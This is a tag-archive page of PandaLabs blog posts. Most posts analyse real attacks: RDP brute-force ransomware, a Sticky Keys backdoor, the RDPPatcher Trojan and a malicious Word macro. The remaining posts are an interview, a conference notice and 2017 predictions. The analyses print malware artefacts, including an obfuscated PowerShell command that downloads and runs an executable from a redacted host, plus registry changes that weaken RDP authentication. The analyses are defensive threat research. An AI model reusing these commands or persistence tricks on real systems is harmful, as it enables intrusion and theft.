Tag Archives: PandaLabs

WYSIWYE: A User-Friendly Interface for Cybercrooks

What You See Is What You Encrypt.

The trend of installing malware on corporate networks through the Remote Desktop Protocol is booming among cybercriminals. In the last few months we have analyzed several cases of ransomware attacks directed at companies from different European countries that share this methodology and are being perpetrated by the same attackers.

Once credentials are obtained through a brute force attack on the RDP, the cybercriminals gain access to the computer.

At this point, when the goal is to deploy ransomware, attackers simply execute the corresponding malware automatically to start encryption and ultimately display the ransom message. However, here we can see a more personalized type of attack

In the intrusion analyzed, we see that the ransomware has an interface through which it can be configured according to the attacker’s preferences, starting with the email address that will appear in the ransom note that will be sent to the victim.


With this customized attack, it’s possible to hand-pick the network computers whose information the attacker would like to encrypt, choose files, self-delete upon completing the encryption, enter stealth mode, etc.


How to protect your business from customized attacks

The survival of any company in a digital environment calls for establishing a solid corporate network security strategy. Prevention in the face of unknown cybersecurity threats with the goal of neutralizing it as soon as possible, or blocking an attacker should he succeed in gaining entry to the system, plays a role of top priority today.

In the present case study, from PandaLabs we blocked attack attempts that used this form of ransomware against companies protected by Adaptive Defense in Germany, Belgium, Sweden, and Spain.

Here are the MD5s of the ransomware:


A timely investment in prevention, detection, and response technologies, instead of adopting perimeter-based solutions, guarantees better preparation in the defense against cyberattacks.

The post WYSIWYE: A User-Friendly Interface for Cybercrooks appeared first on Panda Security Mediacenter.

Sticky Attacks: When the operating system turns against you

Cyber-attackers are always finding new ways of bypassing the protection systems installed on computers in order to avoid detection and steal user data. In that respect, Black Hat hackers have always turned to malware-based attacks (phishing, network worms, or the dreaded Trojans with ransomware as the most dangerous example) to reach their goals: break into companies to steal credentials and huge amounts of other data in exchange for a ransom… At least, until now.

PandaLabs has recently detected a quite clever attack targeting a company in Hungary. What makes it so special? Well, the attack does not use any malware as such, but scripts and other tools belonging to the operating system itself in order to bypass scanners. This is just another example of the increased self-confidence and professionalization we have been observing among cyber-crooks in recent months.

Analysis of a malware-less attack

First, and as has become the norm in the latest security incidents analyzed at the lab, the attack starts with the attackers launching a brute-force attack against a server with the Remote Desktop Protocol (RDP) enabled. Once they get the computer’s login credentials, they have complete access to it.

Then, the first thing that the attackers do is run the sethc.exe file with the parameter 211 from the computer’s Command Prompt window (CMD). This turns on the system’s “Sticky Keys” feature. We are sure you have seen this message before:


Next, a program called “Traffic Spirit” is downloaded and run. “Traffic Spirit” is a traffic generator application which in this case is used to make extra money out of the compromised computers.

Traffic Spirit website

Then, a self-extracting file is launched that uncompresses the following files in the %Windows%cmdacoBin folder:

  • registery.reg
  • SCracker.bat
  • sys.bat

The attackers then proceed to run the Windows registry editor (Regedit.exe) to add the following key contained in the registery.reg file:

This key aims at ensuring that every time the Sticky Keys feature is used (sethc.exe), a file called SCracker.bat gets run. This is a batch file that implements a very simple authentication system. Running the file displays the following window:

The user name and password are obtained from two variables included in the sys.bat file:

This way, the attacker installs a backdoor on the affected machine. With this backdoor, the attacker will be able to connect to the targeted computer without having to enter the login credentials, enable the Sticky Keys feature (for example, by pressing the SHIFT key five times), and enter the relevant user name and password to open a command shell:

The command shell shortcuts will allow the attacker to access certain directories, change the console color, and make use of other typical command-line commands.

However, the attack doesn’t stop here. In their attempt to make as much profit as possible from the targeted company, the attacker installs a bitcoin miner to take advantage of every compromised computer for free money. Bitcoin mining software aims to use the victims’ computer resources to generate the virtual currency without them realizing. A cheap and very effective way to monetize computer infections.

How does the Sticky Keys feature aid cyber-crooks?

If an attacker can actually access a targeted computer via an RDP connection, what do they need a backdoor for? The answer to this question is quite simple: By installing a backdoor on the affected machine, even if the victim realizes that their system has been compromised and changes the Remote Desktop credentials, all the attacker has to do is  press the SHIFT key five times to enable Sticky Keys and run the backdoor to be able to access the system again. And remember, all of this without running malware on the affected computer.

Adaptive Defense 360, Panda Security’s advanced cyber-security solution, was capable of stopping this targeted attack thanks to the continuous monitoring of the company’s IT network, saving the organization from serious financial and reputational harm. Protect your corporate network with the security solution that best adapts to your needs.


The post Sticky Attacks: When the operating system turns against you appeared first on Panda Security Mediacenter.

Compilation of PandaLabs Reports

The following is a compilation of all past PandaLabs reports. It is a complete record of the cybersecurity lab’s highlights.


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


The post Compilation of PandaLabs Reports appeared first on Panda Security Mediacenter.

RDPPatcher, the Attack that Sells Access to your Computer at a Low Price

In recent months, there’s been a significant uptick in PandaLabs reports of malware that is installed using a Remote Desktop Protocol (RDP). Every day, we witness thousands of infection attempts using ransomware, hijacking systems for bitcoin mining, etc., which all have one thing in common: access via RDP after gaining entry with credentials obtained using the brute force method.

There are plenty of useful purposes for an RDP, but unfortunately in the wrong hands it can become a weapon for cybercriminals. We’ve already spoken of a shared history between RDP and ransomware, especially in the corporate environment.

The new attack discovered uses the same technique of entry, but its goal is completely different from those analyzed previously. This time, after infiltrating the system, it focuses on finding Point of Sale Terminals (POS’s) and ATMs. The reason for this is that they are simple terminals to attack anonymously from the Internet, and the economic profit of selling stolen information is high.

RDPPatcher: Selling system access on the black market

In the present case, the brute force attack lasted a little over two months until, in January 2017, they hit upon the correct credentials and gained access to the system. Once the system was compromised, the cybercriminals attempted to infect it with malware. They found their attempts blocked by Adaptive Defense, at which point they modified the malware and tried again, without success. Since Panda’s advanced cybersecurity solution is not based on signatures and does not rely on previous knowledge of malware in order to block it, modifying the malware didn’t change the result.

It’s clear from the malware analysis what the purpose of the attack is. The hashes of the two file are the following:

MD5  d78be752e991ccbec16f11e4fc6b2115

SHA1  4cc9d2c98f22aefab50ee217c1a0d872e93ce541

MD5  950e8614db5c567f66d0900ad09e45ac

SHA1  9355a60dd51cfd02a921444e92e012e25d0a6be

Both were programmed on Delphi and packaged with Aspack. After unpacking them, we found that they were very similar to each other. We analyzed the most recent of them: (950e8614db5c567f66d0900ad09e45ac).

This Trojan, detected as Trj/RDPPatcher.A modifies the Windows records in order to change the type of RDP validation. These are the entries that the system modifies:

HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp /v UserAuthentication /t REG_DWORD /d 1
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp” /v UserAuthentication /t REG_DWORD /d 1

And deletes the following entries if they are present in the system:

“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem” /v legalnoticecaption /f
“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem” /v legalnoticetext /f

Subsequently, it leaves another file (MD5: 78D4E9BA8F641970162260273722C887) in the %TEMP% directory. This file is a version of the application rdpwrap and is run via the runas command with the parameters “-i –s” in order to activate concurrent RDP sessions on the system.

It then proceeds to profile the machine and obtain its information:

  • Username
  • Device name
  • Amount of time the device has been turned on
  • Operating system version
  • Language
  • Virtual maching
  • Memory
  • Processor name
  • Number of processor cores
  • Processor speed
  • Antivirus

It then connects to the control server (C&C server) to access a list of services that measure the speed of connection to the Internet, and later saves the data related to upload and download speed. Next it checks which antivirus is installed on the computer. Contrary to what we are accustomed to seeing in most malware attacks, it does not do this to remove the installed antivirus or to change its behavior. It is simply gathering data.

This is the list that we have extracted from the binary with the processes that it searches:

See Table 1
Once this is done, it begins to search for different types of software to continue profiling the computer. It mainly looks for POS, ATM, and online gambling software. What follows is a small part of the list of software that it searches (in total there are several hundred):

See Table 2

It also combs through browsing history, where another list is contained, categorized by areas of interest:

See Table 3
These chains are searched for in the browser history by the malware itself. They’re used to “label” the computer based on software used and webpages visited.

Once it’s finished with the data gathering from the system, it makes a web petition to the C&C. In order to hide the sending of the information via web traffic from detection systems, it first encrypts it with AES128 using the password “[email protected]}||v*{hGqvYUG”, which is embedded in the sample analyzed. It then codifies it on base64.

Example of the encrypted petition.

The C&C server used for this malware sample is located in Gibraltar:


As we’ve seen, the first thing the attacker seeks to do is to inventory the computer, compiling all types of information (hardware, software, webpages visited, Internet connection speed), and install an application that allows multiple RDP sessions at once. At no point does credentials theft, or any other data theft, occur.

The explanation for this is very simple: the cybercriminals behind these attacks sell access to these computers for a very small fee. Being in possession of so much data from every system allows them to sell access to other groups of cybercriminals specializing in different fields. For example, groups that specialize in the theft of card data can acquire computers with POS software, and so on. Cybercrime has indeed become a profitable racket.

The post RDPPatcher, the Attack that Sells Access to your Computer at a Low Price appeared first on Panda Security Mediacenter.

Malware Capable of Paralyzing an Entire Ministry Neutralized

Cyberthreats are a constant risk and affect public administrations significantly. So much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service, and also, above all, to data leaks concerning everything from personal information to state secrets.

The combination of new technologies and the increase in the complexity of attacks, as well as the professionalization of cybercriminals, is highly dangerous. These are trends that we are predicting for 2017.

Last December, a large-scale spam campaign spanning more than ten countries was carried out, and specifically targeted a major European ministry. The attack, via phishing, was highly advanced and combined social engineering tactics with a powerful Trojan.

The attack is sent by email with an attached Word document. At first, we suspected that it was a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country.

The present analysis describes the technical features of the harmful code found in the macro of the Word document. The goal of the macro was to download and run another malicious component.


Below are shown a few static properties of the analyzed files.

The hash of the Word document is the following:

MD5:  B480B7EFE5E822BD3C3C90D818502068

SHA1:  861ae1beb98704f121e28e57b429972be0410930

According to the document’s metadata, the creation date was 2016-12-19. The malicous code’s signature, downloaded by Word, is the following:

MD5:  3ea61e934c4fb7421087f10cacb14832

SHA1:  bffb40c2520e923c7174bbc52767b3b87f7364a9


1.  Infection Vectors

The Word document gets to the victim’s computer by way of a spam email coming from a healthcare company. The text tricks the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it.

Screen cap of the actual message


According to the data recovered by Panda Security’s Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.

The majority of recipients attempted to open the Word document the same day they received it, December 19.


Map of countries affected by the spam campaign


2. Interactions with the infected system

The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself.

Both the macro and its chains are obfuscated. Also, the macro is designed to run immediately upon being opened.

Part of the obfuscated code contained in the macro

Part of the obfuscated code contained in the macro


Once the macro is running, the Word doc runs the following command in the system:

cmd.exe /c pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle    hidDEN (NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:Users????AppDataRoaming.Exe’);STaRt-PRoCESS ‘C:Users????AppDataRoaming.eXe’

The system symbol (cmd.exe) runs the powershell with two embedded commands going through parameters:

  1. The first powershell command downloads en EXE from this URL (in %APPDATA%.exe): http://xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe
  2. This generates a file in the root of APPDATA.
  3. The next powershell command (Start-process) is used to run the downloaded file.

Thanks to the data obtained by the Intelligence Collective at Panda Security, we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family. Panda’s clients were protected proactively, without need of signatures or updates.

The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to bot network. It then waits for commands from the Command & Control Server. These commands come from the cybercriminals that operate it, and is able to download further new malware and carry out all kinds of malicious actions.

Digitization in Public Administration leads to the exponential growth of the creation, storage and management of huge quantities of confidential data — data that does not allow for a single oversight.

The post Malware Capable of Paralyzing an Entire Ministry Neutralized appeared first on Panda Security Mediacenter.

Panda Security to Participate in This Year’s RSA Conference

This February, from the 13th to the 17th, the XXII Edition of the RSA Conference, the largest event of cyber security in the world, will be held at the San Francisco Moscone Center. Major companies, suppliers and cybersecurity gurus will gather to find solutions to their business concerns and discuss industry trends — an incomparable venue in which Panda Security will be giving advice on cybersecurity strategies.

An extensive list of national and international experts will give an array of lectures and will be present as exhibitors during the five days of the event. Among the list of cybersecurity gurus you will find Luis Corrons, technical director of PandaLabs (@Luis_Corrons), who will share his thoughts with the attendees at the Panda Security booth (4542).

In keeping with this year’s theme, “The Power of Opportunity”, we will talk not only about malware and cybersecurity predictions for 2017, but also the benefits of a strategy that combines big data and machine learning in the security of your business — cutting-edge technology that constitutes a great leap forward in advanced cybersecurity solutions and will be presented over the course of the event.

Did you know that more than 250,000 new threats are detected in our laboratory every day? We will address how to anticipate potential threats with practical examples and real cases that seem like something out of science fiction. Advanced cybersecurity and prevention are, as always,

A powerful panel of experts bringing together more than 45,000 participants and a large number of exhibitions and activities await you at the RSA Conference 2017, an event in which innovation in cybersecurity is the center of attention.

PandaLabs, the Laboratory That Has the Answers to Your Questions

PandaLabs is Panda Security’s anti-malware lab and represents the company’s nerve center in terms of malware. Luis Corrons, its technical director, is one of the experts who will be representing the company at the Panda Security booth.

The countermeasures necessary to protect Panda Security’s customers on a global scale from all types of malicious code are produced in real time and uninterruptedly at the laboratory.

PandaLabs is also responsible for the detailed analysis of all types of malware, in order to improve the protection offered to Panda Security users.

Don’t miss your chance to consult with the experts! Join us and discover the latest technologies and pioneering developments in the industry.

More Information

When: February 13-17, 2017

Tickets: Check the price list here and get your discount by presenting the Panda Exhibition Pass: XE7PANDA (redemption deadline is Thursday, February 16th)

Where: Moscone Center, San Francisco.

Panda Security will be at booth number 4542 (look for us on the map!)

The post Panda Security to Participate in This Year’s RSA Conference appeared first on Panda Security Mediacenter.

Spora, a Sophisticated New Ransomware, Detected in January

A few days ago, our colleagues at G-Data published an interesting analysis of Spora, a new ransomware that appeared in January. It had first been spotted by the people at ID Ransomware, and is mainly affecting Russia. A link was published in a forum detailing the analysis results of one of the samples sent by way of spam in VirusTotal. It is an HTA file that none of the engines present there detected, neither Panda Security, nor G-Data, nor any other.

Does this mean that the 53 participants in VirusTotal are unable to detect and block this new threat? Not at all. It means that at the time of the analysis nobody had bothered to write a signature to detect a file that, besides, is actually ephemeral. The important thing is to protect users and prevent them from becoming infected. If there is no other way to accomplish this than by creating signature, there’s not much you can do about it. But at least for some of us this is seems to be completely unnecessary in most cases, as in the present one.

Taking a look at the information in our cloud, we have observed and blocked Spora detections from the first moment, without having to create signatures for it. We can confirm that indeed most of the cases are in Russia, although we have also seen cases in Japan.

These are the different hashes that we’ve seen:





Always make sure to detect threats well in advance with a good cybersecurity solution such as Panda’s Adaptive Defense 360.

The post Spora, a Sophisticated New Ransomware, Detected in January appeared first on Panda Security Mediacenter.

It Isn’t Ransomware, But It Will Take Over Your Server Anyway

In this week’s Tales From Ransomware, we take a look at a ransomware that isn’t really ransomware. Nor even malware. But it can hijack your server anyway.

A few days ago we saw a typical Remote Desktop Protocol (RDP) attack, which lead us to believe that it was a similar attack to the one we told you about a few months ago which cybercriminals are using to infect devices with ransomware. But we were very wrong.

First of all because instead of encrypting data, it locks the desktop with a password that the victim doesn’t know. Secondly, it does not demand a ransom (!) in exchange for the credential, but rather seeks to keep the device locked for as long as possible so that it can be used for bitcoin mining for as long as possible. And thirdly, it doesn’t use malware as such.

Once they’ve gained access to your machine by brute force (this particular server was fielding 900 attempts daily) the attacker copies a file called BySH01.zip. This in turn contains:

  • BySH01.exe (executable through AutoIt)
  • 7za.exe (goodware, the well-known free tool 7zip)
  • tcping.exe (goodware, a tool for performing TCP pings)
  • MW_C.7z (a compressed password-protected file), which contains:
    • An application –goodware for bitcoin mining
    • An application –goodware for blocking the Windows desktop

The attacker runs the BySH01.exe file, and the following interface appears:

Кошелек – Wallet; Имя воркера – User Name; Количество ядер – Number of cores; Пароль – Password; Локация – Location; Пусть установки – Installation path; Расширения системы – Processor Extension; Порт – Port; Добавить в автозагрузку – Add to startup; Установить – Install; Удалить – Delete; Тест – Test; Пинг – Ping; Локер – Locker

With the help of our colleagues at Panda Russia, those of us who don’t know Russian can get an approximate idea of what its telling us with the above word list.

Basically, the bitcoin mining application uses this interface to configure how many cores to use, what extension of processor instructions to use, what “wallet” to send the bitcoins to, etc. Once the desired configuration is selected, the attacker clicks on Установить to install and run the bitcoins mining application. The application is called CryptoNight, which was designed for mining bitcoins using CPUs.

Then they click on Локер, which installs and runs the desktop lock application. It is the commercial application Desktop Lock Express 2, modified only so that the information shown in the properties of the file are the same as those of the system file svchost.exe. Finally it clears all the files used in the attack except CryptoNight and Desktop Lock Express 2.

Desktop Lock Express 2, the application used by the attackers.

We detected and blocked several attacks in different countries. Examples such as this one show how, once again, cybercriminals take advantage of weak passwords that can be guessed using the brute force method over a given period of time. Malware is no longer necessary to gain access to the system, so it’s up to you to use a robust password that will keep out unwanted visitors.

Tips for the System Admin

In addition to using a solution like Adaptive Defense, which detects and prevents this kind of attack, a couple of tidbits of advice for all administrators who have to have an open RDP:

  • Configure it to use a non-standard port. What 99.99% of cybercriminals do is track all Internet on TCP and UDP ports 3389. They might bother to track others, but they do not have to, since most do not change these ports. Those who do change ports do so because they are careful about security, which probably means that their credentials are already complex enough to not be gotten by brute force within any reasonable amount of time.
  • Monitor failed RDP connection attempts. Brute force attacks can easily be identified in this way, since they use automated systems and can be seen making a new attempt every few seconds.

The post It Isn’t Ransomware, But It Will Take Over Your Server Anyway appeared first on Panda Security Mediacenter.

Eddy Willems Interview: Smart Security and the “Internet of Trouble”

For this week’s guest article, Luis Corrons, director of PandaLabs, spoke with Eddy Willems, Security Evangelist at G Data Software AG, about security in the age of the Internet of Things.

Luis Corrons: Over the course of your more than two decades in the world of computer security, you’ve achieved such milestones as being the cofounder of EICAR, working with security forces and major security agencies, writing the entry on viruses in the encyclopedia Encarta, publishing a book, among other things. What dreams do you still have left to accomplish?

Eddy Willems: My main goal from the beginning has always been to help make the (digital) world a safer and better place. That job is not finished yet. To be able to reach a wide public, from beginners to more experienced internet users, I wrote my book ‘Cybergevaar’ (Dutch for Cyberdanger) originally in my native language. After that it has been translated into German. But for it to have a maximum effect, I really want it to be published in the most widely spoken languages in the world like English, Spanish or even Chinese. That really is a dream I still want to accomplish. It would be nice if we could make the world a little bit safer and at the same time make life a little bit harder for cyber criminals with the help of this book.

Another ambition that fits into my dream of making the world a safer place, is to get rid of bad tests and increase the quality of tests of security products. Correct tests are very important for the users but also for the vendors who create the products. Correct tests will finally lead to improved and better security products and by that finally to a safer world. That’s the reason why I am also involved in AMTSO (Anti Malware Testing Standards Organization). There is still a lot to do in that area.

LC: Since the beginning of 2010 you’ve been working as a Security Evangelist for the security company G Data Software AG. How would you define your position and what are your responsibilities?

EW: In my position as Security Evangelist at G DATA, I’m forming the link between technical complexity and the average Joe. I am responsible for a clear communication to the security community, press, law enforcement, distributors, resellers and end users. This means, amongst other things that I am responsible for organizing trainings about malware and security, speaking at conferences and consulting associations and companies. Another huge chunk of my work is giving interviews to the press. The public I reach with my efforts is very diverse: it ranges from 12 year olds to 92 year olds, from first time computer users to IT security law makers.

LC: Data that’s been collected over the years leads us to conclude that 18% of companies have suffered malware infections from social networks. What measures can be taken to avoid this? Are social networks really one of the main entry points for malware in companies?

Eddy Willems

EW: Social networks are only one vector of many infections mechanisms we see these days. Of course we can’t deny that social networks are still responsible for even some recent infections: end of November a Locky Ransomware variant was widely spread via Facebook Messenger. But still Facebook, Google, LinkedIn and others have some good protective measures in place to stop a lot of malware already. Surfing the web and spammed phishing or malware mails are still the main entry points for malware in companies. Delayed program and OS updating and patching and overly used administration rights on normal user computers inside companies are key to most security related problems.

LC: What do you believe to be the greatest security problem facing businesses on the Internet? Viruses, data theft, spam…?

The weak link is always an unaware or undertrained employee. The human factor, as I like to call it.

EW: The biggest security threat to businesses are targeted phishing mails to specific employees in the company. A professional, (in his native language) well-written created phishing mail in which the user is encouraged to open the mail and attachment or to click on a specific link, has been seen in a lot of big APT cases as the main entry point to the whole company. These days even a security expert can be tricked into opening such a mail.

Another great threat is data breaches. Most of those are unintentional mistakes made by employees. A lack of awareness and a lack of understanding of technologies and its inherent risks are at the base of this.

Both of these risks boil down to the same thing: the weak link is always an unaware or undertrained employee. The human factor, as I like to call it.

LC: Criminals are always looking to attack the greatest amount of victims possible, be it through the creation of new malware for Android terminals or through older versions that may be more exposed. Do cybercriminals see infecting old devices the same way as infecting new devices? Which is more lucrative?

EW: Android has become the number 2 OS platform for malware after MS Windows. Our latest G DATA report saw an enormous increase in Android related malware in 2016. G DATA saw a new Android malware strain every 9 seconds. That says enough about the importance of the platform. Current analyses by G DATA experts show that drive-by infections are now being used by attackers to infect Android smartphones and tablets as well. Security holes in the Android operating system therefore pose an even more serious threat. The long periods until an update for Android reaches users‘ devices in particular can aggravate the problem further. One of the bigger issues is that lots of old Android devices will not receive any updates anymore, bringing the older devices down to the same level of (no) security as Windows XP machines. Cybercriminals will look to the old and new Android OS in the future. Malware for the old Android versions will be more for the masses, but malware for the new versions Android versions needs to be more cleverly created and are more lucrative if used for targeted attacks on business or governmental targets.

LC: In this age of technological revolution through which we are now living, new services are invented without giving a second thought to the possibility that it may be put to some ill-intentioned use, and are therefore left under-protected. Has the Internet of Things become the main challenge with regard to cybersecurity? Does the use of this technology conflict with user privacy?

EW: I wrote about the Internet of Things already a couple of years ago at the G DATA blog where I predicted that this platform would become one of the main challenges of cybersecurity. In my opinion IoT stands more or less for the Internet of Trouble. Security by design is dearly needed, but we’ve seen the opposite unfortunately in a lot of cases.

Besides Smart grids and Smart factories, Smart cities, Smart cars and Smart everything else, we will also need Smart security.

IoT is seriously affecting our privacy unfortunately. The amount of data IoT devices are creating is staggering and that data is being reused (or should we say misused). You’ve undoubtedly agreed to terms of service at some point, but have you ever actually read through that entire document or EULA? For example, an insurance company might gather information from you about your driving habits through a connected car when calculating your insurance rate. The same could happen for health insurance thanks to fitness trackers. Sometimes the vendor states in the EULA that he isn’t responsible for data leakage. It brings up the question if this is not conflicting with the new GDPR (General Data Protection Regulation).

I am convinced the Internet of Things will bring about much that is good. I can already hardly live without it. It is already making our lives easier. But IoT is much bigger than we think.  It’s also built into our cities and infrastructure. We now have the opportunity of bringing fundamental security features into the infrastructure for new technologies when they are still in the development stage. And we need to seize this opportunity. That is ‘smart’ in my opinion. Besides Smart grids and Smart factories, Smart cities, Smart cars and Smart everything else, we will also need Smart security. I only hope the world has enough security engineers to help and create that Smart security.

LC: New trends such as the fingerprint and other biometric techniques used with security in mind are being implemented, especially in the business world. What’s your opinion about the use of these methods? For you, what would the perfect password look like?

EW: Simple, the perfect password is the password I can forget. In an ideal world, I don’t need to authenticate myself with other tools anymore except part(s) of my body. It’s unbelievable how long it takes to implement this in a good way. The theory is there for ages and we have the technology now, it’s only not perfect enough which makes it costly to implement in all our devices. After that comes the privacy issues related to it, which possibly will postpone the implementation again.

We also need to think about the downside of biometric techniques. If my fingerprint or iris gets copied somehow, I don’t have the option of resetting or changing it. So we will always need to have a combination of authentication factors.

LC: Your book Cybergevaar pitches itself as a sort of information manual on IT security for the general public, offering various tips and advice. What were some of the greatest challenges in outlining a book aimed at every kind of Internet user? What piece of advice on display is most important for you?

EW: One of the big challenges in writing the book was leaving out most of the technical details and still remaining on a level that everyone, including experts and non-technical people, wants to read. I tried to keep a good level by including lots of examples, personal anecdotes, expert opinions and a fictional short story. Keeping all your programs and OS up-to-date and using common sense with everything you do when using your computer and the internet is the best advice you can give to everybody! The real problem most of the time is, as I mentioned before, the human factor.

LC: There’s been some talk of a “new reality”, the omnipresent Internet in every aspect of our lives. From your perspective, is this phenomenon truly necessary?

EW: IoT is just the beginning of it. I think we are very near to that ‘new reality’ even if you don’t like it. Our society will be pushed to it automatically, think about Industry 4.0 and Smart cities. In the future you will only be allowed to buy a car with only these specific Smart features in it or you will not be allowed to drive in specific cities. A smart cooking pan that automatically tracks calories and records your delicious recipes as you cook in real time will only work with your new internet connected Smart cooking platform. The omnipresent internet is maybe not really necessary but you’ll be pushed to it anyway! The only way to escape it will be maybe a vacation island specifically created for it.

We also need to think about the downside of biometric techniques. If my fingerprint or iris gets copied somehow, I don’t have the option of resetting or changing it.

LC: What have been for you the worst security violations that have marked a before-and-after in the world of cybersecurity? Do you have any predictions for the near future?

EW: The Elk Cloner virus and the Brain virus back in the eighties … everything else is just an evolution of it. We probably wouldn’t have this interview if nothing had happened 30 years ago or … maybe it was only a matter of time? Stuxnet was built to sabotage Iran’s Nuclear program. Regin demonstrates even more the power of a multi-purpose data collection tool. Both built by state agencies showing that malware is much more than just a money digging tool for cybercriminals. And of course the Snowden revelations as it showed us how problematic mass-surveillance is and will be and how it reflects back to our privacy which is slowly fading away.

Malware will always be there as long as computers -in whatever shape or form they may be around, be it a watch, a refrigerator or a tablet- exist and that will stay for a long time I think. Cybercrime and ‘regular’ crime will be more and more combined (eg. modern bank robberies). Malware will influence much more our behavior (eg. buying, voting, etc) and ideas resulting in money or intelligence loss. Smart devices will be massively misused (again) in DDoS and Ransomware attacks (eg. SmartTv’s). And this is only short-term thinking.

The only way forward for the security industry, OS makers, application vendors and IoT designers, is to work even closer together to be able to handle all new kind of attacks and security related issues and malware. We are already doing that to some extent, but we should invest much more in it.


The post Eddy Willems Interview: Smart Security and the “Internet of Trouble” appeared first on Panda Security Mediacenter.

In 2017, less malware and more advanced attacks


The decline in new malware and the increased professionalization of attacks will set the tone in cybersecurity for next year, according to PandaLabs’ Cybersecurity  Predictions for 2017. Ransomware will encompass the majority of attacks, and companies will amass a larger number of increasingly advanced intrusions.

As far as cybersecurity goes, we bid farewell to a year replete with high-profile attacks that have jeopardized large corporations and private users. Ransomware attacks from Petya, Trojans such as Gugi for Android, the spyware Pegasus, PunkeyPOS, or large-scale attacks targeting point of sale terminals as well as the recent DDoS (Distributed Denial of Service) attacks have affected large organizations and international communication networks.

We rank the most popular attacks of the year, analyzing their evolution and taking a look at the cybernetic threats that 2017 has in store:


Cybercriminals focus their efforts on those attacks which can rake in the most profit, using more effective tactics and professionalizing their operations in a way that allows them to make quick and easy money in an efficient manner.


This Trojan Horse will take center stage with regard to cybersecurity and will cannibalize other more traditional attacks that are based on data theft. The pursuit of profit is the primary motivation of cybercriminals, and ransomware is the simplest and most effective way to achieve this. Some things never change: victims of this hijacking malware will have to decide whether to pay, or not, to recover their data. Panda Security encourages victims to keep in mind that paying the ransom does not guarantee the total recovery of stolen data.


The number of attacks directed at corporations will increase, as these attacks become more and more advanced. Companies are already the prime target of cybercriminals, as their information is more valuable than that of private users.

Internet of Things (IoT)

The next cybersecurity nightmare. The technological revolution has ushered in the complete integration of smaller devices into the grid, which can be converted into entryways into corporate networks.

DDoS Attacks

The final months of 2016 witnessed the most powerful DDoS (Distributed Denial of Service) attacks in history. These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers, etc.). 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business (by blocking web access, online shopping, etc.).

Mobile Phones

Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability. Android users will get the worst of it in the next 12 months.


The precarious situation with regard to international relations can have huge — and serious — consequences in the field of cybersecurity. Governments will want access to still more information (at a time when encryption is becoming more popular), and intelligence agencies will become still more interested in obtaining information that could benefit industry in their countries. A global situation of this kind could hamper data sharing initiatives in the next year.

Download the Pandalab’s Predictions here:




The post In 2017, less malware and more advanced attacks appeared first on Panda Security Mediacenter.